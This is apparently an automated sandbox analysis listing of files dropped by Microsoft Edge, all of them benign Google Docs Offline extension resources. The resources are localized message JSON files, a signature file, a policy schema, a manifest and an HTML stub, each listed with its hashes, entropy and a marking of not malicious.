                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1941
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                                                  MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                                                  SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                                                  SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                                                  SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1969
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                                                  MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                                                  SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                                                  SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                                                  SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1674
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                                                  MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                                                  SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                                                  SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                                                  SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1063
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                                                  MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                                                  SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                                                  SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                                                  SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1333
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                                                  MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                                                  SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                                                  SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                                                  SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1263
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                                                  MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                                                  SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                                                  SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                                                  SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1074
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                                                  MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                                                  SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                                                  SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                                                  SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):879
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                                                  MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                                                  SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                                                  SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                                                  SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1205
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                                                  MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                                                  SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                                                  SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                                                  SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):843
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                                                  MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                                                  SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                                                  SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                                                  SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):912
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                                                  MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                                                  SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                                                  SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                                                  SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):11406
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                                                                  MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                                                                  SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                                                                  SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                                                                  SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):854
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                                                  MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                                                  SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                                                  SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                                                  SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2525
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                                                                  MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                                                                  SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                                                                  SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                                                                  SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):97
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                                                  MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                                                  SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                                                  SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                                                  SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
